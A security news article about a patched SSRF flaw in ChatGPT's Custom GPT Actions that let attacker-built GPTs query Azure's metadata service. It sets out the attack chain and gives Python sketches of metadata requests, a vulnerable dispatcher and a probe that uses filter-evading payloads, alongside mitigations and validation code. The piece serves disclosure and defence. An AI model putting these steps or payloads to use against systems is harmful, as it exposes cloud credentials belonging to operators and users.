ChatGPT Hacked Through Custom GPTs: SSRF Vulnerability Exposes Cloud Secrets

Published On: November 12, 2025


The power and versatility of AI models like ChatGPT are undeniable, yet their rapid evolution introduces new attack surfaces. Researchers at Open Security recently disclosed a critical Server-Side Request Forgery (SSRF) vulnerability in OpenAI’s ChatGPT platform, rooted in the Custom GPT “Actions” feature. The flaw allowed attackers to steer the AI into accessing internal cloud infrastructure, potentially compromising sensitive Azure credentials and other secrets.

Understanding the Vulnerability: SSRF in Custom GPT Actions

The core of this vulnerability lies in the way Custom GPTs handle user-defined URLs through their “Actions” functionality. Actions let builders extend a GPT’s capabilities by integrating it with external APIs: the builder supplies a schema describing the API endpoints the GPT may invoke.

The SSRF vulnerability meant that a malicious actor could control the URL a Custom GPT requested. Rather than calling the intended external API, a crafted URL parameter could direct the GPT’s backend to make requests to internal network resources. In the case reported by Cyber Security News, the vulnerability enabled the GPT to query the cloud metadata service of the underlying Azure infrastructure.

Cloud metadata services expose detailed information about the virtual machine instance they run on, including temporary credentials, instance profiles, and other configuration data. For an attacker, this information is a significant stepping stone toward escalating privileges or reaching other cloud resources.
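As a concrete illustration, the Azure Instance Metadata Service (IMDS) listens on the link-local address 169.254.169.254 and only answers requests carrying a Metadata: true header. The Python sketch below is a minimal illustration of the kind of request an SSRF primitive effectively lets an attacker issue from inside the cloud environment; it is not the researchers’ actual probe.

    import requests

    # Azure's Instance Metadata Service (IMDS) is reachable only from inside
    # the VM, at a fixed link-local address.
    IMDS_URL = "http://169.254.169.254/metadata/instance"

    # IMDS rejects requests lacking the "Metadata: true" header, a guard meant
    # to blunt naive SSRF; any proxy that forwards arbitrary headers defeats it.
    resp = requests.get(
        IMDS_URL,
        params={"api-version": "2021-08-01"},
        headers={"Metadata": "true"},
        timeout=3,
    )

    # The JSON response describes the instance: subscription, resource group,
    # network configuration, and more.
    print(resp.json()["compute"]["resourceGroupName"])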

The Exploitation Path: From Custom GPT to Azure Credentials

The attack scenario unfolded as follows:

  • An attacker would create a Custom GPT designed to interact with a seemingly benign external service.
  • Within the “Actions” configuration for this Custom GPT, the attacker would define an API call where a URL parameter could be controlled or influenced.
  • Instead of providing a legitimate external URL, the attacker would inject an internal IP address or hostname, targeting the Azure cloud metadata endpoint (e.g., http://169.254.169.254/metadata/instance?api-version=2021-08-01).
  • When a user interacted with this malicious Custom GPT, prompting it to perform an action that triggered the crafted API call, the Custom GPT’s backend infrastructure would unwittingly make a request to the internal metadata service.
  • The response from the metadata service, containing potentially sensitive Azure credentials or other instance data, would then be processed by the GPT. In some scenarios, this information could be exfiltrated directly or indirectly by the attacker (a simplified sketch of the vulnerable pattern follows this list).
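The server-side weakness at the heart of this chain is a backend that fetches whatever URL the Action configuration names. The following Python sketch is a hypothetical simplification of that vulnerable pattern, not OpenAI’s actual code:

    import requests

    def invoke_action(endpoint_url: str, params: dict) -> str:
        """Hypothetical Action dispatcher: fetches whatever URL the Custom
        GPT's Action configuration names, on behalf of the model."""
        # VULNERABLE: endpoint_url is attacker-defined and fetched verbatim,
        # so nothing stops it from pointing at internal-only services.
        resp = requests.get(endpoint_url, params=params, timeout=10)
        return resp.text

    # A malicious Action schema swaps a benign API for the metadata endpoint.
    # (Real Azure IMDS additionally demands the "Metadata: true" header shown
    # in the earlier sketch.)
    leaked = invoke_action(
        "http://169.254.169.254/metadata/instance",
        {"api-version": "2021-08-01"},
    )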

This incident underscores the inherent risks of granting AI models network access without sufficient input validation. Tricking an AI into performing server-side requests to arbitrary locations on the internal network is a classic SSRF attack, now adapted for the AI age.

Remediation Actions and Best Practices

Addressing SSRF vulnerabilities, particularly in complex AI ecosystems, requires a multi-layered approach.

  • Input Validation and Sanitization: Rigorous validation of all user-supplied URLs and parameters is paramount. Whitelisting allowed domains and protocols is significantly more secure than blacklisting (see the validation sketch after this list).
  • Principle of Least Privilege: The underlying infrastructure running AI models should operate with the absolute minimum necessary network access and permissions. Restrict outbound requests from the AI environment to only known and approved endpoints.
  • Network Segmentation: Implement strict network segmentation to isolate AI environments from critical internal infrastructure and cloud metadata services. This limits the blast radius of a successful SSRF exploit.
  • Disable Unnecessary Metadata Access: If possible, restrict or disable access to cloud metadata services entirely from application instances that do not strictly require it.
  • Web Application Firewalls (WAFs): Deploy WAFs that are configured to detect and block suspicious outbound requests, including those targeting internal IP ranges or known metadata endpoints.
  • API Gateway Protections: Utilize API gateways to centralize and enforce security policies, including request rewriting, URL validation, and access control, before requests reach the core AI service.
  • Regular Security Audits: Conduct regular security assessments, penetration testing, and code reviews, specifically looking for URL parsing vulnerabilities and potential SSRF vectors in AI integrations.
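As a minimal sketch of the first item, assuming a hypothetical is_safe_url helper placed in front of every outbound Action request, allowlist validation might look like this:

    import ipaddress
    import socket
    from urllib.parse import urlparse

    # Assumption: an illustrative allowlist; a real deployment would manage
    # this per-integration.
    ALLOWED_HOSTS = {"api.partner.example"}

    def is_safe_url(url: str) -> bool:
        """Allow only HTTPS requests to allowlisted hosts that resolve to
        public addresses."""
        parsed = urlparse(url)
        if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
            return False
        try:
            infos = socket.getaddrinfo(parsed.hostname, parsed.port or 443)
        except socket.gaierror:
            return False
        for _family, _type, _proto, _canon, sockaddr in infos:
            ip = ipaddress.ip_address(sockaddr[0])
            # 169.254.0.0/16 (link-local) covers the cloud metadata endpoint.
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                return False
        return True

Even a check like this is only a first layer: DNS rebinding and HTTP redirects can bypass resolve-time validation, which is why the egress restrictions and network segmentation above remain essential.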

Tools for Detection and Mitigation

Security professionals can leverage a variety of tools to detect and mitigate SSRF vulnerabilities. While tooling aimed specifically at AI-integrated SSRF is still maturing, general web application security tools remain highly relevant.

  • Burp Suite Professional: Comprehensive web vulnerability scanner and proxy for manual testing and automated crawling to identify SSRF. https://portswigger.net/burp
  • OWASP ZAP: Free and open-source web application security scanner for automated and manual vulnerability detection, including SSRF patterns. https://www.zaproxy.org/
  • Nuclei: Fast and customizable vulnerability scanner based on simple YAML templates, useful for identifying known SSRF patterns. https://nuclei.projectdiscovery.io/
  • Cloud Security Posture Management (CSPM) Tools: Monitor cloud configurations for misconfigurations that could enable SSRF or privilege escalation, such as overly permissive network access rules. Vendors include Palo Alto Prisma Cloud, Wiz, and Orca Security.
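Beyond off-the-shelf scanners, a short custom probe can flag in-band SSRF in a URL-accepting parameter. The sketch below assumes a hypothetical target endpoint and watches for field names distinctive to Azure IMDS responses; run anything like it only against systems you are authorized to test.

    import requests

    # Assumption: a hypothetical endpoint that fetches a caller-supplied URL.
    TARGET = "https://app.example.test/fetch"

    # Classic metadata payload plus an IPv6-mapped variant that can slip past
    # naive string filters.
    PAYLOADS = [
        "http://169.254.169.254/metadata/instance?api-version=2021-08-01",
        "http://[::ffff:169.254.169.254]/metadata/instance?api-version=2021-08-01",
    ]

    # Field names distinctive to Azure IMDS responses.
    MARKERS = ("azEnvironment", "resourceGroupName")

    for payload in PAYLOADS:
        try:
            resp = requests.get(TARGET, params={"url": payload}, timeout=5)
        except requests.RequestException:
            continue
        if any(marker in resp.text for marker in MARKERS):
            print(f"Possible SSRF via payload: {payload}")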

Key Takeaways

The discovery of an SSRF vulnerability within ChatGPT’s Custom GPTs serves as a stark reminder: as AI systems become more integrated and powerful, they also become new targets for known attack techniques. The fundamental principles of secure software development, such as robust input validation, the principle of least privilege, and network segmentation, are as critical for AI applications as they are for traditional web applications.

This incident, while patched, highlights the ongoing need for vigilance and proactive security measures in the rapidly expanding landscape of artificial intelligence. Developers and security teams must collaborate closely to ensure that the innovations of AI do not inadvertently open doors to novel or recycled security threats.
